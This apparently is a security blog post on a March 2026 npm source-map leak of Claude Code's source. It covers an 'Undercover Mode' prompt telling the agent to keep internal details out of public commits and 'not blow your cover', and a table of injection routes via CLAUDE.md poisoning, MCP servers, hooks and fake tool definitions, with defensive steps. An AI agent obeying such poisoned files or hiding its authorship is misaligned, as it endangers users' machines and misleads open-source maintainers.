Security Apr 2, 2026 · 11 min read

Claude Code Source Code Leak: What Happened, What Was Found, and What Developers Should Do

Q: What is Claude Code's Undercover Mode?

Undercover Mode is a system prompt feature that instructs Claude Code to hide Anthropic-internal information when working on public or open-source repositories. The prompt tells Claude it is 'operating UNDERCOVER' and that commit messages, PR titles, and PR bodies must not contain internal model codenames or unreleased features.

On March 31, 2026, Anthropic accidentally published 512,000 lines of Claude Code's TypeScript source code to npm. Within hours, the entire codebase was mirrored across GitHub and dissected by thousands of developers. Here is exactly what happened, what the code revealed, and the concrete steps you should take to protect yourself.

What Happened: The npm Source Map Incident

At approximately 4:00 AM ET on March 31, 2026, Anthropic pushed version 2.1.88 of the @anthropic-ai/claude-code package to the public npm registry. Buried inside was a 59.8 MB JavaScript source map file (.map) — an internal debugging artifact that was never meant to ship. Source maps contain a complete mapping back to original source code, and in this case, that meant the full unminified TypeScript codebase: roughly 1,900 files and 512,000 lines of code.

Security researcher Chaofan Shou (@Fried_rice) was the first to discover and broadcast the finding on X. Within hours, the codebase was mirrored to multiple GitHub repositories and analyzed by thousands of developers worldwide. Anthropic pulled the affected version and issued a statement confirming a "release packaging issue caused by human error, not a security breach," emphasizing that no customer data or credentials were exposed.

Key context

This was Anthropic's second leak in a matter of days. Just before this incident, an internal model codename "Mythos" had been accidentally revealed. The back-to-back incidents raised questions about Anthropic's internal release and CI/CD hygiene — a particularly ironic situation for a company whose core mission is AI safety.

How a Source Map Leaks an Entire Codebase

For developers unfamiliar with the mechanism: when you bundle JavaScript or TypeScript for production, tools like esbuild or webpack minify and concatenate source files into a single output. A source map is a companion file that maps every character in the minified output back to its original position in the unminified source. It exists so developers can debug production issues using the original, readable code.

The problem is that source maps embed the entire original source inline (via the sourcesContent field). Ship a source map to production, and you have shipped your entire unminified codebase. This is a well-known risk in web development, but it is less commonly considered for npm CLI packages — which is exactly how it slipped through Anthropic's release pipeline.

Prevention: .npmignore or package.json files field

# .npmignore
*.map
src/
tsconfig.json
.env*

A single line in .npmignore or a files whitelist in package.json would have prevented this.

What the Leaked Code Revealed

The codebase exposed Claude Code's full internal architecture — from tool orchestration and permission systems to unreleased features gated behind compile-time flags. Here are the most significant findings.

1. Undercover Mode

Perhaps the most discussed discovery was a file called undercover.ts containing system prompt instructions that tell Claude Code: "You are operating UNDERCOVER in a PUBLIC/OPEN-SOURCE repository. Your commit messages, PR titles, and PR bodies MUST NOT contain ANY Anthropic-internal information." The instruction continues: "Do not blow your cover."

This appears designed to prevent internal model codenames and unreleased features from leaking when Anthropic's own engineers use Claude Code on public repositories. But the language — "undercover," "do not blow your cover" — sparked debate about AI transparency in open-source contributions. Some projects already prohibit AI-generated code, and this feature suggests Anthropic was actively trying to make Claude's contributions indistinguishable from human work.

2. KAIROS: The Always-On Agent

The code revealed a feature called KAIROS — a persistent, background Claude agent that does not wait for user input. Unlike the current interactive CLI where you type a prompt and get a response, KAIROS watches your development environment, logs events, and proactively acts on things it notices. It can fix errors automatically, run tasks on its own, and send push notifications to users. This is gated behind PROACTIVE/KAIROS compile-time feature flags and is completely absent from external builds.

For teams already building multi-agent systems with Claude Code, KAIROS represents the next logical step: an agent that does not just respond to commands but anticipates needs. The code references April 1–7, 2026 as a teaser window, with a full launch gated for May 2026.

3. 44 Feature Flags and Unreleased Capabilities

Buried inside the codebase were 44 feature flags covering capabilities that are fully built but not yet shipped. The most notable include:

ULTRAPLAN: A 30-minute remote planning mode that uses extended compute for complex architectural decisions
Buddy: A companion agent that works alongside you with persistent memory across sessions
Coordinator Mode: A higher-level orchestrator for managing multiple agent swarms simultaneously
Agent Swarms: The ability to spawn and manage large groups of parallel agents for divide-and-conquer workflows
Workflow Scripts: Reusable, parameterized automation sequences that chain multiple Claude operations

4. Full Tool Orchestration and Permission System

The source code exposed Claude Code's complete tool system — how it reads files, executes bash commands, manages permissions, spawns subagents, and communicates with IDE extensions through a bidirectional layer. For developers who have been using the 1M token context window and wondering what happens behind the scenes, the leak answered those questions in exhaustive detail.

Notably, the code revealed a "frustration detection" system — regex patterns that detect when users express frustration (e.g., swearing or repeating failed requests) and adjust Claude's behavior to be more careful and apologetic. This mechanism was not documented anywhere.

5. Fake Tool Injection Defense

The code includes a system for detecting "fake tools" — situations where a prompt or context file attempts to inject malicious tool definitions that mimic real Claude Code tools. This is a direct defense against prompt injection attacks where a malicious CLAUDE.md file might try to trick Claude into executing unauthorized commands.

Security Implications for Developers

While Anthropic insists no customer data was exposed, the leak has real security consequences. By exposing the exact orchestration logic for MCP servers and Hooks, attackers now have a detailed blueprint for crafting targeted exploits.

Attack Vector	Risk Level	What to Do
Malicious CLAUDE.md context poisoning	High	Audit CLAUDE.md in every cloned repo before running Claude Code
MCP server exploit via crafted repos	High	Pin MCP server versions, vet before enabling
Hooks-based command injection	Medium	Inspect .claude/config.json hooks in untrusted projects
API key exfiltration via subprocess	High	Enable CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1
Prompt injection via fake tool definitions	Medium	Use sandboxed/default mode for untrusted repos

Check Point Research disclosed two specific CVEs related to Claude Code: CVE-2025-59536 and CVE-2026-21852, which demonstrate how malicious project configurations can achieve remote code execution and API key exfiltration. If you are using Claude Code on client projects or in regulated industries, these vulnerabilities demand immediate attention. For teams running autonomous AI agents like OpenClaw, similar security principles apply — always verify configurations before granting agent access.

7 Steps Every Developer Should Take Now

Whether you use Claude Code daily or are evaluating it for your team, these actions will harden your setup against the attack paths now visible in the leaked source.

1. Rotate your Anthropic API keys immediately. Even though Anthropic says no credentials were compromised, the exposed orchestration logic makes key exfiltration attacks easier to craft. Rotate keys via the developer console and monitor usage for anomalies.
2. Enable environment scrubbing. Set CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1 to strip API keys and cloud-provider credentials from subprocess environments (bash, hooks, MCP servers). This was introduced in v2.1.83.
3. Audit CLAUDE.md and .claude/config.json in cloned repositories. Context poisoning through these files is a documented attack path. Never run Claude Code in a freshly cloned repository without inspecting these files first.
4. Treat MCP servers as untrusted dependencies. Pin versions, review source code before enabling, and monitor for unexpected changes. The leaked code shows exactly how MCP servers interact with Claude Code's internals, making targeted exploits more feasible.
5. Keep sandboxing enabled. Use plan mode or default mode for initial code exploration. Reserve bypassPermissions only for fully isolated environments where a compromise has zero blast radius.
6. Update Claude Code to the latest version. Anthropic pulled 2.1.88 and the source map no longer ships. Make sure you are on a version newer than 2.1.88 — and going forward, consider optimizing your Claude Code setup to minimize attack surface alongside cost.
7. Review your npm publish pipeline. If this can happen to Anthropic, it can happen to any team. Add *.map to your .npmignore, use a files whitelist in package.json, and run npm pack --dry-run before every publish to verify exactly what is being shipped.

What This Means for the AI Coding Industry

The Claude Code leak is a watershed moment for AI-assisted development tools. For the first time, the developer community has seen the full internal architecture of a production AI coding agent — not a toy demo, but the tool with 51,000+ GitHub stars that developers use daily for everything from vibe coding to large-scale refactors.

Several implications stand out:

AI agent frameworks will improve faster. Open-source projects like Paperclip and others can now study production-grade patterns for tool orchestration, permission management, and multi-agent coordination. A Rust-based clone called Claurst appeared on GitHub within 48 hours of the leak.
Supply chain security for AI tools is now critical. The same supply chain attacks that have plagued npm for years now intersect with AI agent capabilities. A compromised MCP server or malicious CLAUDE.md is not just a data risk — it is an agent that can execute code on your machine.
Transparency pressure is mounting. The leak showed that the "secret sauce" of AI coding tools is largely in the orchestration — the system prompts, tool definitions, and permission logic — rather than the models themselves. Expect competitors and open-source projects to push for greater transparency in how agentic AI systems make decisions.
Regulated industries need new policies. For enterprises in healthcare, finance, and government, the leak raises urgent questions about AI tool governance. If your AI development pipeline relies on Claude Code, you now need documented risk assessments covering the exposed attack paths.

Lessons for Your Own npm Security

If Anthropic — a company valued at $61.5 billion with a dedicated safety team — can ship source maps to production, every team publishing to npm should audit their own pipeline. Here is a quick checklist:

Use a files whitelist in package.json instead of relying on .npmignore alone
Run npm pack --dry-run in CI before every publish to verify the package contents
Add a size check that fails the build if the package exceeds an expected threshold (59.8 MB should have been a red flag)
Never generate source maps in your production build config, or strip sourcesContent from maps you do ship
If you use Docker for AI agents, follow the Docker isolation best practices we outlined for OpenClaw

The Silver Lining: Engineering Insights Worth Studying

Beyond the security implications, the leak provided rare insight into how a world-class AI coding tool is actually built. Developers noted several engineering patterns worth studying:

Query engine architecture: The LLM API call orchestration system handles retries, streaming, caching, and model routing with elegant abstraction layers
Multi-agent coordination: The subagent spawning and swarm management code shows practical patterns for building agent frameworks at production scale
IDE communication layer: A bidirectional protocol connecting VS Code and JetBrains extensions to the CLI engine — a pattern useful for anyone building developer tools
Permission and sandbox system: The layered permission model with trust prompts, sandboxing, and environment scrubbing is a reference implementation for AI agent safety

As one developer noted on X: "The real revelation is that the secret sauce isn't the model — it's the 512,000 lines of orchestration around it." For teams building with RAG systems and AI agents, this leaked architecture is an invaluable reference — though of course, use it only for learning, not copying.

What Happens Next

The internet does not forget. Despite Anthropic pulling the affected npm version, the source code is permanently available across dozens of GitHub mirrors. Anthropic's ability to maintain a competitive moat through proprietary orchestration logic has been significantly diminished.

But here is the counterargument: Claude Code's real advantage may not be the code itself but the speed of execution, the model quality, and the ecosystem integration. Open-sourcing orchestration logic has not hurt tools like VS Code or Docker. If anything, the leak might accelerate a shift toward official open-sourcing — or at least more transparent documentation of how AI coding agents operate under the hood.

For now, the immediate priority is security. If you use Claude Code — and given its dominance in the vibe coding ecosystem, there is a good chance you do — follow the seven steps above to harden your setup. The leak has made the threat model concrete. Act accordingly.

Need Help Securing Your AI Development Pipeline?

Frequently Asked Questions

What exactly was leaked in the Claude Code source code incident? +

On March 31, 2026, a 59.8 MB JavaScript source map file was accidentally included in version 2.1.88 of the @anthropic-ai/claude-code npm package. This exposed approximately 512,000 lines of TypeScript source code across 1,900 files — the complete Claude Code codebase including tool orchestration, permission systems, system prompts, 44 unreleased feature flags, and internal features like KAIROS (an always-on background agent) and Undercover Mode.

Was any customer data exposed in the Claude Code leak? +

No. Anthropic confirmed that no customer data, API keys, or credentials were included in the leak. The exposed material was the Claude Code application source code itself — the TypeScript codebase that powers the CLI tool. However, the leaked orchestration logic could make it easier for attackers to craft exploits targeting MCP servers, Hooks, and environment variables in developer setups.

Should I stop using Claude Code after the leak? +

No, but you should take immediate security precautions. Update to the latest version (post-2.1.88), rotate your Anthropic API keys, enable CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1, audit CLAUDE.md and .claude/config.json in any cloned repositories before running Claude Code, and keep sandboxing enabled. The tool itself remains functional and secure — the risk comes from attackers who can now craft more targeted exploits against its known architecture.

What is Claude Code's Undercover Mode? +

Undercover Mode is a system prompt feature discovered in the leaked source code that instructs Claude Code to hide Anthropic-internal information when working on public or open-source repositories. The prompt tells Claude it is "operating UNDERCOVER" and that commit messages, PR titles, and PR bodies must not contain internal model codenames or unreleased features. This sparked debate about AI transparency in open-source contributions.

What is KAIROS in Claude Code? +

KAIROS is an unreleased feature discovered in the Claude Code source leak. It is a persistent, always-on background agent that monitors your development environment without waiting for user input. Unlike the current interactive CLI, KAIROS can proactively detect errors, run tasks automatically, and send push notifications. It is gated behind compile-time feature flags and is expected to launch publicly around May 2026.

AI & Agents

Claude Code 1M Token Context Window: The Complete Developer Guide

10 min read

Security

OpenClaw Security Checklist: 13 Checks Before You Run It

8 min read